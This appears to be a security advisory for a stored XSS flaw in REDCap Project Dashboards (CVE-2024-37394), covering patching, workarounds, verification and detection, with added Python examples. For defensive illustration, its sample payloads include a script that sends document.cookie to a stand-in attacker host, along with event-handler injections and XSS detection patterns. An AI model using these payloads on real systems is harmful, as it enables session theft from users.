CVE-2024-37394

5.4 MEDIUM

📋 TL;DR

This stored XSS vulnerability in REDCap lets an authenticated user who can create or edit a Project Dashboard store JavaScript in the dashboard's title and content fields. The script runs in the browser of every other user who opens that dashboard, with that viewer's REDCap session and rights. Any instance on an affected version with Project Dashboards in use is exposed.

💻 Affected Systems

Products:
  • REDCap
Versions: 13.1.9 and earlier (any release that includes the Project Dashboards feature)
Operating Systems: All platforms running REDCap
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated user access to Project Dashboards feature

📦 What is this software?

REDCap (Research Electronic Data Capture) is a web application, developed at Vanderbilt University and licensed to academic and non-profit institutions, for building and managing surveys and research databases. Project Dashboards are pages within a project on which members display summary content to the rest of the project team, which is why a payload stored there reaches many viewers.

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker could hijack viewers' sessions (where the session cookie is readable from script), drive their browsers to perform actions in REDCap with the viewer's rights, including an administrator's, redirect them to attacker-controlled sites, or serve a drive-by download through the trusted REDCap interface.

🟠

Likely Case

A low-privileged project member could phish credentials with an injected login prompt, alter or exfiltrate project data through the viewer's session, or take over the accounts of users who open the malicious dashboard.

🟢

If Mitigated

With output encoding applied where the title and content are rendered (and input validation as a second layer), the injected markup is displayed as literal text rather than executed.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an authenticated account with rights to edit a dashboard, but is straightforward once that is in place: the attacker saves the payload once and waits for other users to browse to it.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 14.2.1 or later

Vendor Advisory: https://www.evms.edu/research/resources_services/redcap/redcap_change_log/

Restart Required: Yes

Instructions:

1. Back up the REDCap database and web files.
2. Download REDCap 14.2.1 or later.
3. Follow the REDCap upgrade instructions.
4. Restart the web server.
5. Verify dashboard functionality.

🔧 Temporary Workarounds

Disable Project Dashboards

Applies to: all

Temporarily disable the Project Dashboards feature so that no new dashboard titles or content can be saved and existing ones are not rendered to viewers.

Turn the feature off in the REDCap configuration until the upgrade is applied.

Implement WAF Rules

Applies to: all

Add web application firewall rules that reject or log XSS payloads submitted to the dashboard title and content fields.

Configure the WAF to filter <script>, javascript:, and other XSS patterns. Treat this as a speed bump, not a fix: a blocklist of literal strings misses event-handler attributes (onerror=, onload=), SVG and iframe vectors, and URL- or entity-encoded payloads, so keep the rules broad and log what they block.

🧯 If You Can't Patch

  • Implement strict input validation on dashboard title and content fields
  • Apply output encoding to all user-controlled content displayed in dashboards
  • Both require changing REDCap's own PHP; keep such local patches minimal, and limit who holds the user rights needed to edit dashboards until the upgrade is applied
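What "rendered harmless as plain text" looks like in code, as an added Python stand-in for the server-side template that renders a dashboard's title and body (REDCap itself is PHP; this is not its code). The payloads are constructed test inputs. The half-fixed variant shows why the attribute context needs quote encoding as well, a common mistake when a fix only escapes angle brackets.

```python
"""Added example, not REDCap's code: a minimal stand-in for the server-side
rendering of a Project Dashboard's title and body, in Python rather than PHP.
The vulnerable renderer interpolates stored input straight into HTML; the
hardened renderer HTML-encodes it for the context it lands in."""
import html

# Constructed inputs a user with dashboard edit rights could save.
PAYLOAD_TITLE = 'Enrollment <script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>'
PAYLOAD_BODY = '<img src=x onerror="alert(document.domain)">'
PAYLOAD_ATTR = '" autofocus onfocus="alert(1)'   # breaks out of a quoted attribute


def render_vulnerable(title: str, body: str) -> str:
    """Stored markup reaches every viewer's browser unchanged (the bug)."""
    return f'<h1 title="{title}">{title}</h1>\n<div class="dash-body">{body}</div>'


def render_hardened(title: str, body: str) -> str:
    """Encode <, >, &, and both quote characters (the htmlspecialchars
    ENT_QUOTES equivalent): safe for element text and for quoted attributes."""
    t = html.escape(title, quote=True)
    b = html.escape(body, quote=True)
    return f'<h1 title="{t}">{t}</h1>\n<div class="dash-body">{b}</div>'


def render_half_fixed(title: str, body: str) -> str:
    """Encodes <, >, & but not quotes: element text is safe, but the title
    attribute can still be broken out of with a double quote."""
    t = html.escape(title, quote=False)
    b = html.escape(body, quote=False)
    return f'<h1 title="{t}">{t}</h1>\n<div class="dash-body">{b}</div>'


if __name__ == "__main__":
    print("vulnerable:\n" + render_vulnerable(PAYLOAD_TITLE, PAYLOAD_BODY))
    print("hardened:\n" + render_hardened(PAYLOAD_TITLE, PAYLOAD_BODY))
    print("half-fixed title attribute:\n" + render_half_fixed(PAYLOAD_ATTR, ""))
```

If the body field must legitimately carry rich text, encoding everything breaks the feature; the alternative is an allowlist HTML sanitizer that keeps a fixed set of tags and attributes, not a blocklist of `<script>`, which the WAF caveat above already shows is bypassable.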

🔍 How to Verify

Check if Vulnerable:

REDCap version is 13.1.9 or earlier and the Project Dashboards feature is enabled. Both conditions are needed: an unpatched build with dashboards unused has no sink for the payload.

Check Version:

The version is shown in the REDCap Control Center and is also recorded in the database configuration table.

Verify Fix Applied:

REDCap version is 14.2.1 or later. Then, in a non-production test project, save a dashboard title containing a harmless marker such as <b>xss-check</b> and confirm that the dashboard page shows it as literal text (entity-encoded in the page source) rather than rendering it as bold.
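The version gate and the canary test behind those steps, as an added Python example (not REDCap tooling). The fixed release is the page's 14.2.1; the canary string and the HTML snippets used to exercise it are constructed. A verbatim reflection of the canary is treated as the vulnerable outcome and an entity-encoded one as the fixed outcome.

```python
"""Added example, not REDCap's own tooling: the version gate and the canary
test behind the verification steps above."""
import html
import re

FIXED_VERSION = (14, 2, 1)   # per the page's "Patch Version"


def parse_version(v: str) -> tuple:
    """'v14.2.1 (something)' -> (14, 2, 1)."""
    m = re.match(r"\s*v?(\d+(?:\.\d+)*)", v)
    if not m:
        raise ValueError(f"unrecognized REDCap version string: {v!r}")
    return tuple(int(x) for x in m.group(1).split("."))


def is_patched(version: str) -> bool:
    """Numeric, not lexical, comparison: '14.10.0' is newer than '14.2.1'."""
    parts = parse_version(version)
    parts += (0,) * (len(FIXED_VERSION) - len(parts))
    return parts >= FIXED_VERSION


def is_vulnerable(version: str, dashboards_enabled: bool) -> bool:
    """Exposure needs both an unpatched build and the feature turned on."""
    return dashboards_enabled and not is_patched(version)


# Marker to save in a test project's dashboard title: an unlikely token plus
# markup that is inert as text but would execute if rendered raw. Constructed.
CANARY = "xssCheck7f3a<svg onload=alert(1)>"


def reflection_state(page_html: str, canary: str = CANARY) -> str:
    """How the saved canary comes back in the rendered dashboard page:
    'raw' = unencoded markup (still vulnerable), 'encoded' = entity-escaped
    (fix in place), 'absent' = field not rendered on this page."""
    if canary in page_html:
        return "raw"
    if html.escape(canary, quote=True) in page_html:
        return "encoded"
    return "absent"


if __name__ == "__main__":
    for v in ("13.1.9", "14.2.0", "14.2.1", "14.10.0"):
        print(v, "patched" if is_patched(v) else "UNPATCHED")
    print(reflection_state("<h1>xssCheck7f3a&lt;svg onload=alert(1)&gt;</h1>"))
```

Fetch the rendered dashboard page with an ordinary authenticated session and pass its HTML to `reflection_state`; do the test in a throwaway project, and delete the dashboard afterwards so the marker does not linger in a page other users open.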

📡 Detection & Monitoring

Log Indicators:

  • Unusual dashboard creation/modification patterns (a user who has never edited a dashboard suddenly saving several)
  • Long or encoded strings in dashboard fields (URL-encoded %3C, HTML entities such as &lt;, or base64 blobs where a short title is expected)
  • Repeated saves of the same dashboard with varying markup, which suggests payload tuning against a filter

Network Indicators:

  • Unexpected outbound connections from users' browsers while on REDCap dashboard pages, for example to a host that is not REDCap itself
  • Script tags or event-handler attributes in dashboard save requests

SIEM Query:

source="redcap_logs" AND (dashboard_title CONTAINS "<script>" OR dashboard_content CONTAINS "javascript:")

The field names above are placeholders for however your pipeline labels the dashboard title and body; map them to your schema. Match on decoded values, or the query misses the encoded variants listed under Log Indicators, and add the event-handler (onerror=, onload=) and <svg / <img cases, which the two literals above do not cover.
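The detection logic those indicators describe, run over constructed records, as an added Python example (not REDCap's own logging or a vendor query). The record shape (ts, user, ip, action, field, value) is an assumption about how dashboard edits would be exported to a SIEM; map it to your own pipeline's fields. It decodes URL and HTML-entity encoding before matching, so %3Cscript%3E or &lt;img onerror=... is not missed, flags oversized values, and counts hits per user to surface the repeated-attempt indicator.

```python
"""Added example, not REDCap's own or a vendor query: a detector for the log
indicators listed above, run over constructed dashboard-change records."""
import html
import json
import re
from collections import Counter
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Starter patterns, applied after decoding. Extend the handler list as needed.
XSS_PATTERNS = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("dangerous-tag", re.compile(r"<\s*(?:svg|iframe|object|embed|img|math|body)\b", re.I)),
    ("event-handler", re.compile(r"\bon(?:load|error|focus|click|mouseover|toggle|animationstart)\s*=", re.I)),
    ("script-uri", re.compile(r"(?:javascript|vbscript)\s*:", re.I)),
]
LONG_VALUE = 2000   # assumed threshold: dashboard titles never approach this


def normalize(value: str) -> str:
    """Undo up to three rounds of URL and HTML-entity encoding, since
    attackers double-encode to slip past filters that match literals."""
    v = value
    for _ in range(3):
        nv = html.unescape(unquote(v))
        if nv == v:
            break
        v = nv
    return v


def analyze_record(rec: Dict) -> List[str]:
    """Reasons a dashboard-change record looks suspicious ([] if none)."""
    reasons: List[str] = []
    if not str(rec.get("action", "")).startswith("dashboard"):
        return reasons            # only dashboard create/edit events are in scope
    raw = str(rec.get("value", ""))
    decoded = normalize(raw)
    hits = [name for name, pat in XSS_PATTERNS if pat.search(decoded)]
    if hits:
        reasons.append("xss-pattern:" + ",".join(hits))
        if decoded != raw:
            reasons.append("encoded-payload")   # only visible after decoding
    if len(raw) > LONG_VALUE:
        reasons.append("oversized-field")
    return reasons


def analyze_log(lines) -> Tuple[List[Tuple[str, str, List[str]]], Counter]:
    """Per-record findings plus a per-user hit count (the 'multiple attempts' signal)."""
    findings = []
    per_user: Counter = Counter()
    for line in lines:
        rec = json.loads(line)
        reasons = analyze_record(rec)
        if reasons:
            findings.append((rec["user"], rec["field"], reasons))
            per_user[rec["user"]] += 1
    return findings, per_user


# Constructed sample records (not real REDCap log output).
SAMPLE_LOG = [
    '{"ts":"2024-06-10T14:02:11Z","user":"alice","ip":"10.0.0.5","action":"dashboard_create","field":"title","value":"Enrollment by site"}',
    '{"ts":"2024-06-10T14:05:40Z","user":"mallory","ip":"10.0.0.9","action":"dashboard_edit","field":"title","value":"Stats %3Cscript%3Efetch(%27https://attacker.invalid/%27%2Bdocument.cookie)%3C/script%3E"}',
    '{"ts":"2024-06-10T14:06:02Z","user":"mallory","ip":"10.0.0.9","action":"dashboard_edit","field":"body","value":"&lt;img src=x onerror=alert(document.domain)&gt;"}',
    '{"ts":"2024-06-10T14:07:15Z","user":"bob","ip":"10.0.0.7","action":"record_update","field":"notes","value":"<script>not a dashboard</script>"}',
]

if __name__ == "__main__":
    found, by_user = analyze_log(SAMPLE_LOG)
    for user, field, reasons in found:
        print(f"{user:8} {field:6} {reasons}")
    print("hits per user:", dict(by_user))
```

The `record_update` line is deliberately left alone: the same markup in a data-entry field may be a different issue, but it is not this CVE's sink, and scoping the rule keeps the alert actionable.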
